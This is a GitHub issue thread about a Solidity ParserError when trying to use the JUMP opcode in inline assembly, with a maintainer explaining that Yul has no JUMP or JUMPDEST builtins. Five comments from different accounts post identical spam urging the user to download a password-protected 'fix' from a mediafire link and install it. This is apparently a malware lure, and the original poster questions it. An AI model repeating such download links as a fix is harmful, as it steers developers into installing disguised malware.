### ISSUE TITLE
ParserError for JUMP opcode

### ISSUE THREAD

**Issue by amit-supraoracles** [ethereum/solidity#15361]
## Description

I just want to see how JUMP opcode works but facing ParserError on line 14

## Environment

- Compiler version: ^0.8.0
- Target EVM version (as per compiler settings):Remix VM Cancun
- Framework/IDE (e.g. Truffle or Remix): Remix
- EVM execution environment / backend / blockchain client: Remix
- Operating system: Linux

## Steps to Reproduce
```
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract MinimalJumpExample {
    uint256 public result;

    function jumpTest() public {
        assembly {
            let destination := jumpDest  // Label for jump destination
            jump(destination)            // Perform the jump

            result := 1                  // This will be skipped

            jumpDest:
            result := 2                  // Execution continues here
        }
    }
}

```

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amit-supraoracles** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

malicious code right ?? will it work on linux ?

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by clonker** [comment]
There is no Yul builtin for the `JUMP` opcode (or `JUMPI` / `JUMPDEST` for that mattter), see here: https://docs.soliditylang.org/en/v0.8.26/yul.html#evm-dialect
You can check out https://www.evm.codes/ if you want to play around with it regardless.

**Comment by amit-supraoracles** [comment]
> There is no Yul builtin for the `JUMP` opcode (or `JUMPI` / `JUMPDEST` for that mattter), see here: https://docs.soliditylang.org/en/v0.8.26/yul.html#evm-dialect You can check out https://www.evm.codes/ if you want to play around with it regardless.

Thanks @clonker !!
![image](https://github.com/user-attachments/assets/ee389ecf-2b02-49c7-a983-dd8ca824b6d2)
